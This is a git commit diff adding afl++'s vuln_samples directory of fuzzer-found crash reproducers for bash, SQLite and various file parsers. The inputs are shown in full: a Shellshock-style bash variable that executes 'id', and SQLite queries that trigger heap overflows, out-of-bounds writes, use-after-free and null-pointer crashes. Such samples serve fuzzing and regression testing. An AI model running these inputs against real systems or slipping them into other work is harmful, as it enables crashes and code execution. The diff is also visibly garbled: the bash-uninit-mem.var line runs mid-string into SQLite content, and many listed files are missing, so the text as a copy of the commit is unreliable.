From f367728c4435670caf2e9cc5acad257e7766cc65 Mon Sep 17 00:00:00 2001 
From: van Hauser Date: Tue, 28 May 2019 16:40:24 +0200 Subject: afl++ 2.52c initial commit --- docs/vuln_samples/bash-cmd-exec.var | 1 + docs/vuln_samples/bash-uninit-mem.var | 1 + docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4 | Bin 0 -> 10377 bytes docs/vuln_samples/ffmpeg-h264-bad-read.mp4 | Bin 0 -> 4376 bytes docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4 | Bin 0 -> 1259 bytes docs/vuln_samples/file-fpu-exception.elf | Bin 0 -> 2572 bytes docs/vuln_samples/firefox-bmp-leak.bmp | Bin 0 -> 892 bytes docs/vuln_samples/firefox-chrome-leak.jpg | Bin 0 -> 1771 bytes docs/vuln_samples/firefox-gif-leak.gif | Bin 0 -> 38 bytes docs/vuln_samples/firefox-gif-leak2.gif | Bin 0 -> 179 bytes docs/vuln_samples/jxrlib-crash.jxr | Bin 0 -> 512 bytes docs/vuln_samples/jxrlib-crash2.jxr | Bin 0 -> 472 bytes docs/vuln_samples/jxrlib-crash3.jxr | Bin 0 -> 492 bytes docs/vuln_samples/jxrlib-crash4.jxr | Bin 0 -> 526 bytes docs/vuln_samples/lesspipe-cpio-bad-write.cpio | Bin 0 -> 512 bytes docs/vuln_samples/libjpeg-sos-leak.jpg | Bin 0 -> 642 bytes docs/vuln_samples/libjpeg-turbo-dht-leak.jpg | Bin 0 -> 595 bytes docs/vuln_samples/libtiff-bad-write.tif | Bin 0 -> 360 bytes docs/vuln_samples/libtiff-uninit-mem.tif | Bin 0 -> 408 bytes docs/vuln_samples/libtiff-uninit-mem2.tif | Bin 0 -> 408 bytes docs/vuln_samples/libtiff-uninit-mem3.tif | Bin 0 -> 216 bytes docs/vuln_samples/libtiff-uninit-mem4.tif | Bin 0 -> 216 bytes docs/vuln_samples/libxml2-bad-read.xml | 3 +++ docs/vuln_samples/msie-dht-leak.jpg | Bin 0 -> 876 bytes docs/vuln_samples/msie-jxr-mem-leak.jxr | Bin 0 -> 882 bytes docs/vuln_samples/msie-png-mem-leak.png | Bin 0 -> 293 bytes docs/vuln_samples/msie-tiff-mem-leak.tif | Bin 0 -> 408 bytes docs/vuln_samples/msie-zlib-dos.png | Bin 0 -> 434 bytes docs/vuln_samples/openssl-null-ptr.der | Bin 0 -> 15 bytes docs/vuln_samples/openssl-null-ptr2.der | Bin 0 -> 398 bytes docs/vuln_samples/photoshop-mem-leak.jpg | Bin 0 -> 996 bytes docs/vuln_samples/sqlite-bad-free.sql | 
2 ++ docs/vuln_samples/sqlite-bad-ptr.sql | 1 + docs/vuln_samples/sqlite-bad-ptr2.sql | 1 + docs/vuln_samples/sqlite-bad-ptr3.sql | Bin 0 -> 199 bytes docs/vuln_samples/sqlite-heap-overflow.sql | 2 ++ docs/vuln_samples/sqlite-heap-overwrite.sql | 1 + docs/vuln_samples/sqlite-negative-memset.sql | 1 + docs/vuln_samples/sqlite-null-ptr1.sql | 2 ++ docs/vuln_samples/sqlite-null-ptr10.sql | 1 + docs/vuln_samples/sqlite-null-ptr11.sql | 1 + docs/vuln_samples/sqlite-null-ptr12.sql | 1 + docs/vuln_samples/sqlite-null-ptr13.sql | 1 + docs/vuln_samples/sqlite-null-ptr14.sql | 1 + docs/vuln_samples/sqlite-null-ptr15.sql | 1 + docs/vuln_samples/sqlite-null-ptr2.sql | 1 + docs/vuln_samples/sqlite-null-ptr3.sql | 1 + docs/vuln_samples/sqlite-null-ptr4.sql | 1 + docs/vuln_samples/sqlite-null-ptr5.sql | 1 + docs/vuln_samples/sqlite-null-ptr6.sql | 1 + docs/vuln_samples/sqlite-null-ptr7.sql | 1 + docs/vuln_samples/sqlite-null-ptr8.sql | 1 + docs/vuln_samples/sqlite-null-ptr9.sql | 1 + docs/vuln_samples/sqlite-oob-read.sql | 1 + docs/vuln_samples/sqlite-oob-write.sql | 6 ++++++ docs/vuln_samples/sqlite-stack-buf-overflow.sql | 1 + docs/vuln_samples/sqlite-stack-exhaustion.sql | 1 + docs/vuln_samples/sqlite-unint-mem.sql | 1 + docs/vuln_samples/sqlite-use-after-free.sql | 1 + docs/vuln_samples/strings-bfd-badptr.elf | Bin 0 -> 324 bytes docs/vuln_samples/strings-bfd-badptr2.elf | Bin 0 -> 324 bytes docs/vuln_samples/strings-stack-overflow | 3 +++ docs/vuln_samples/strings-unchecked-ctr.elf | Bin 0 -> 141 bytes docs/vuln_samples/tcpdump-arp-crash.pcap | Bin 0 -> 114 bytes docs/vuln_samples/tcpdump-ppp-crash.pcap | Bin 0 -> 1126 bytes docs/vuln_samples/unrtf-arbitrary-read.rtf | Bin 0 -> 551 bytes docs/vuln_samples/unzip-t-mem-corruption.zip | Bin 0 -> 344 bytes 67 files changed, 43 insertions(+) create mode 100644 docs/vuln_samples/bash-cmd-exec.var create mode 100644 docs/vuln_samples/bash-uninit-mem.var create mode 100644 docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4 create mode 
100644 docs/vuln_samples/ffmpeg-h264-bad-read.mp4 create mode 100644 docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4 create mode 100644 docs/vuln_samples/file-fpu-exception.elf create mode 100644 docs/vuln_samples/firefox-bmp-leak.bmp create mode 100644 docs/vuln_samples/firefox-chrome-leak.jpg create mode 100644 docs/vuln_samples/firefox-gif-leak.gif create mode 100644 docs/vuln_samples/firefox-gif-leak2.gif create mode 100644 docs/vuln_samples/jxrlib-crash.jxr create mode 100644 docs/vuln_samples/jxrlib-crash2.jxr create mode 100644 docs/vuln_samples/jxrlib-crash3.jxr create mode 100644 docs/vuln_samples/jxrlib-crash4.jxr create mode 100644 docs/vuln_samples/lesspipe-cpio-bad-write.cpio create mode 100644 docs/vuln_samples/libjpeg-sos-leak.jpg create mode 100644 docs/vuln_samples/libjpeg-turbo-dht-leak.jpg create mode 100644 docs/vuln_samples/libtiff-bad-write.tif create mode 100644 docs/vuln_samples/libtiff-uninit-mem.tif create mode 100644 docs/vuln_samples/libtiff-uninit-mem2.tif create mode 100644 docs/vuln_samples/libtiff-uninit-mem3.tif create mode 100644 docs/vuln_samples/libtiff-uninit-mem4.tif create mode 100644 docs/vuln_samples/libxml2-bad-read.xml create mode 100644 docs/vuln_samples/msie-dht-leak.jpg create mode 100644 docs/vuln_samples/msie-jxr-mem-leak.jxr create mode 100644 docs/vuln_samples/msie-png-mem-leak.png create mode 100644 docs/vuln_samples/msie-tiff-mem-leak.tif create mode 100644 docs/vuln_samples/msie-zlib-dos.png create mode 100644 docs/vuln_samples/openssl-null-ptr.der create mode 100644 docs/vuln_samples/openssl-null-ptr2.der create mode 100644 docs/vuln_samples/photoshop-mem-leak.jpg create mode 100644 docs/vuln_samples/sqlite-bad-free.sql create mode 100644 docs/vuln_samples/sqlite-bad-ptr.sql create mode 100644 docs/vuln_samples/sqlite-bad-ptr2.sql create mode 100644 docs/vuln_samples/sqlite-bad-ptr3.sql create mode 100644 docs/vuln_samples/sqlite-heap-overflow.sql create mode 100644 
docs/vuln_samples/sqlite-heap-overwrite.sql create mode 100644 docs/vuln_samples/sqlite-negative-memset.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr1.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr10.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr11.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr12.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr13.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr14.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr15.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr2.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr3.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr4.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr5.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr6.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr7.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr8.sql create mode 100644 docs/vuln_samples/sqlite-null-ptr9.sql create mode 100644 docs/vuln_samples/sqlite-oob-read.sql create mode 100644 docs/vuln_samples/sqlite-oob-write.sql create mode 100644 docs/vuln_samples/sqlite-stack-buf-overflow.sql create mode 100644 docs/vuln_samples/sqlite-stack-exhaustion.sql create mode 100644 docs/vuln_samples/sqlite-unint-mem.sql create mode 100644 docs/vuln_samples/sqlite-use-after-free.sql create mode 100644 docs/vuln_samples/strings-bfd-badptr.elf create mode 100644 docs/vuln_samples/strings-bfd-badptr2.elf create mode 100644 docs/vuln_samples/strings-stack-overflow create mode 100644 docs/vuln_samples/strings-unchecked-ctr.elf create mode 100644 docs/vuln_samples/tcpdump-arp-crash.pcap create mode 100644 docs/vuln_samples/tcpdump-ppp-crash.pcap create mode 100644 docs/vuln_samples/unrtf-arbitrary-read.rtf create mode 100644 docs/vuln_samples/unzip-t-mem-corruption.zip (limited to 'docs/vuln_samples') 
diff --git a/docs/vuln_samples/bash-cmd-exec.var b/docs/vuln_samples/bash-cmd-exec.var new file mode 100644 index 00000000..6422d427 --- /dev/null +++ b/docs/vuln_samples/bash-cmd-exec.var @@ -0,0 +1 @@ +() { _; } >_[$($())] { id; } \ No newline at end of file diff --git a/docs/vuln_samples/bash-uninit-mem.var b/docs/vuln_samples/bash-uninit-mem.var new file mode 100644 index 00000000..6d7d5360 --- /dev/null +++ b/docs/vuln_samples/bash-uninit-mem.var @@ -0,0 +1 @@ +() { x() { _; }; x() { _; } <O));insert into t0 +select randomblob(0)-trim(0); diff --git a/docs/vuln_samples/sqlite-bad-ptr.sql b/docs/vuln_samples/sqlite-bad-ptr.sql new file mode 100644 index 00000000..46e78afa --- /dev/null +++ b/docs/vuln_samples/sqlite-bad-ptr.sql @@ -0,0 +1 @@ +SELECT 0 UNION SELECT 0 ORDER BY 1 COLLATE""""""""; diff --git a/docs/vuln_samples/sqlite-bad-ptr2.sql b/docs/vuln_samples/sqlite-bad-ptr2.sql new file mode 100644 index 00000000..cd613d08 --- /dev/null +++ b/docs/vuln_samples/sqlite-bad-ptr2.sql @@ -0,0 +1 @@ +PRAGMA foreign_keys=1;CREATE TABLE t1("""0"PRIMARY KEy REFERENCES t1 ON DELETE SET NULL);REPLACE INTO t1 SELECT(0); diff --git a/docs/vuln_samples/sqlite-bad-ptr3.sql b/docs/vuln_samples/sqlite-bad-ptr3.sql new file mode 100644 index 00000000..7518816c Binary files /dev/null and b/docs/vuln_samples/sqlite-bad-ptr3.sql differ diff --git a/docs/vuln_samples/sqlite-heap-overflow.sql b/docs/vuln_samples/sqlite-heap-overflow.sql new file mode 100644 index 00000000..066fc835 --- /dev/null +++ b/docs/vuln_samples/sqlite-heap-overflow.sql @@ -0,0 +1,2 @@ +DROP TABLE IF EXISTS t;CREATE VIRTUAL TABLE t0 USING fts4();insert into t0 select zeroblob(0);SAVEPOINT O;insert into t0 +select(0);SAVEPOINT E;insert into t0 SELECT 0 UNION SELECT 0'x'ORDER BY x; diff --git a/docs/vuln_samples/sqlite-heap-overwrite.sql b/docs/vuln_samples/sqlite-heap-overwrite.sql new file mode 100644 index 00000000..51ed82c3 --- /dev/null +++ b/docs/vuln_samples/sqlite-heap-overwrite.sql 
@@ -0,0 +1 @@ +ATTACH "file:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?mode=memory&cache=shared" AS x; \ No newline at end of file diff --git a/docs/vuln_samples/sqlite-negative-memset.sql b/docs/vuln_samples/sqlite-negative-memset.sql new file mode 100644 index 00000000..d647bea0 --- /dev/null +++ b/docs/vuln_samples/sqlite-negative-memset.sql @@ -0,0 +1 @@ +SELECT*from(select"",zeroblob(0),zeroblob(1E9),zeroblob(0),zeroblob(150000000),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(1E9),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0)),(select"",zeroblob(1E9),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(1E9),(0),zeroblob(150000000),(0),zeroblob(0),(0)EXCEPT select zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0)); diff --git a/docs/vuln_samples/sqlite-null-ptr1.sql b/docs/vuln_samples/sqlite-null-ptr1.sql new file mode 100644 index 00000000..3f9d46c7 
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr1.sql
@@ -0,0 +1,2 @@
+create table t0(t);insert into t0
+select strftime();
diff --git a/docs/vuln_samples/sqlite-null-ptr10.sql b/docs/vuln_samples/sqlite-null-ptr10.sql
new file mode 100644
index 00000000..798bbf14
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr10.sql
@@ -0,0 +1 @@
+SELECT fts3_tokenizer(@0());
diff --git a/docs/vuln_samples/sqlite-null-ptr11.sql b/docs/vuln_samples/sqlite-null-ptr11.sql
new file mode 100644
index 00000000..f6bcf65f
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr11.sql
@@ -0,0 +1 @@
+select''like''like''like#0;
diff --git a/docs/vuln_samples/sqlite-null-ptr12.sql b/docs/vuln_samples/sqlite-null-ptr12.sql
new file mode 100644
index 00000000..8d14a86b
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr12.sql
@@ -0,0 +1 @@
+PRAGMA e;select lower(0);select lower(0)"a",""GROUP BY a ORDER BY a;
diff --git a/docs/vuln_samples/sqlite-null-ptr13.sql b/docs/vuln_samples/sqlite-null-ptr13.sql
new file mode 100644
index 00000000..e730db32
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr13.sql
@@ -0,0 +1 @@
+WITH x AS(SELECT*FROM t)SELECT""EXCEPT SELECT 0 ORDER BY 0 COLLATE"";
diff --git a/docs/vuln_samples/sqlite-null-ptr14.sql b/docs/vuln_samples/sqlite-null-ptr14.sql
new file mode 100644
index 00000000..37b9baed
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr14.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE x USING fts4();VALUES(0,0),(0,0),(0,0),(0,0);PRAGMA writable_schema=ON;UPDATE sqlite_master SET sql=''WHERE name='';UPDATE sqlite_master SET sql='CREATE table t(d CHECK(T(#0)';SAVEPOINT K;SAVEPOINT T;SAVEPOINT T;ANALYZE;ROLLBACK;SAVEPOINT E;DROP TABLE IF EXISTS t;
diff --git a/docs/vuln_samples/sqlite-null-ptr15.sql b/docs/vuln_samples/sqlite-null-ptr15.sql
new file mode 100644
index 00000000..83d5c9d1
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr15.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE t4 USING fts4(0,b,c,notindexed=0);INSERT INTO t4 VALUES('','','0');BEGIN;INSERT INTO t4 VALUES('','','0');INSERT INTO t4(t4)VALUES('integrity-check');
diff --git a/docs/vuln_samples/sqlite-null-ptr2.sql b/docs/vuln_samples/sqlite-null-ptr2.sql
new file mode 100644
index 00000000..11c5a378
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr2.sql
@@ -0,0 +1 @@
+DETACH(select group_concat(q));
diff --git a/docs/vuln_samples/sqlite-null-ptr3.sql b/docs/vuln_samples/sqlite-null-ptr3.sql
new file mode 100644
index 00000000..14df82a7
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr3.sql
@@ -0,0 +1 @@
+select(select strftime());
diff --git a/docs/vuln_samples/sqlite-null-ptr4.sql b/docs/vuln_samples/sqlite-null-ptr4.sql
new file mode 100644
index 00000000..fdb80476
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr4.sql
@@ -0,0 +1 @@
+select n()AND+#00;
diff --git a/docs/vuln_samples/sqlite-null-ptr5.sql b/docs/vuln_samples/sqlite-null-ptr5.sql
new file mode 100644
index 00000000..7bbb7856
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr5.sql
@@ -0,0 +1 @@
+select e.*,0 from(s,(L))e;
diff --git a/docs/vuln_samples/sqlite-null-ptr6.sql b/docs/vuln_samples/sqlite-null-ptr6.sql
new file mode 100644
index 00000000..2eb04bc4
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr6.sql
@@ -0,0 +1 @@
+PRAGMA encoding='UTF16';CREATE VIRTUAL TABLE È USING s;
\ No newline at end of file
diff --git a/docs/vuln_samples/sqlite-null-ptr7.sql b/docs/vuln_samples/sqlite-null-ptr7.sql
new file mode 100644
index 00000000..57ab12c5
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr7.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE t USING fts4(tokenize=);
diff --git a/docs/vuln_samples/sqlite-null-ptr8.sql b/docs/vuln_samples/sqlite-null-ptr8.sql
new file mode 100644
index 00000000..4d5db064
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr8.sql
@@ -0,0 +1 @@
+CREATE TABLE p(a UNIQUE,PRIMARY KEY('a'))WITHOUT rowid;
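Review bot: The text-mode samples are byte-exact reproducers, but nothing visible in this commit protects them from being rewritten by tooling: `sqlite-null-ptr6.sql` carries a non-ASCII identifier and no trailing newline, and `bash-cmd-exec.var`, `sqlite-heap-overwrite.sql`, `sqlite-oob-read.sql` and `strings-stack-overflow` also end without one. An editor, whitespace fixer or end-of-line conversion that appends a newline or re-encodes the file would silently turn a reproducer into a different input. Consider a `.gitattributes` entry such as `docs/vuln_samples/* -text` so the whole directory is stored like `sqlite-bad-ptr3.sql`, which git already treats as binary; the view here is limited to `docs/vuln_samples`, so an existing attribute elsewhere in the tree cannot be ruled out.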
diff --git a/docs/vuln_samples/sqlite-null-ptr9.sql b/docs/vuln_samples/sqlite-null-ptr9.sql
new file mode 100644
index 00000000..0ae836a2
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr9.sql
@@ -0,0 +1 @@
+CREATE TABLE t0(z);WITH d(x)AS(SELECT*UNION SELECT 0)INSERT INTO t0 SELECT 0 FROM d;
diff --git a/docs/vuln_samples/sqlite-oob-read.sql b/docs/vuln_samples/sqlite-oob-read.sql
new file mode 100644
index 00000000..4fe53b4f
--- /dev/null
+++ b/docs/vuln_samples/sqlite-oob-read.sql
@@ -0,0 +1 @@
+create table t0(‰ DEFAULT(0=0)NOT/**/NULL);REPLACE into t0 select'';
\ No newline at end of file
diff --git a/docs/vuln_samples/sqlite-oob-write.sql b/docs/vuln_samples/sqlite-oob-write.sql
new file mode 100644
index 00000000..9b2c427d
--- /dev/null
+++ b/docs/vuln_samples/sqlite-oob-write.sql
@@ -0,0 +1,6 @@
+CREATE VIRTUAL TABLE t0 USING fts4(x,order=DESC);
+INSERT INTO t0(docid,x)VALUES(-1E0,'0(o');
+INSERT INTO t0 VALUES('');
+INSERT INTO t0 VALUES('');
+INSeRT INTO t0 VALUES('o');
+SELECT docid FROM t0 WHERE t0 MATCH'"0*o"';
diff --git a/docs/vuln_samples/sqlite-stack-buf-overflow.sql b/docs/vuln_samples/sqlite-stack-buf-overflow.sql
new file mode 100644
index 00000000..4be57fd0
--- /dev/null
+++ b/docs/vuln_samples/sqlite-stack-buf-overflow.sql
@@ -0,0 +1 @@
+SELECT printf('%*.*f',90000||006000000&6600000000,00000000000000000909000000000000.0000000000000000)""WHERE"">"";
diff --git a/docs/vuln_samples/sqlite-stack-exhaustion.sql b/docs/vuln_samples/sqlite-stack-exhaustion.sql
new file mode 100644
index 00000000..6031a93b
--- /dev/null
+++ b/docs/vuln_samples/sqlite-stack-exhaustion.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE t0 USING fts4(content=t0);
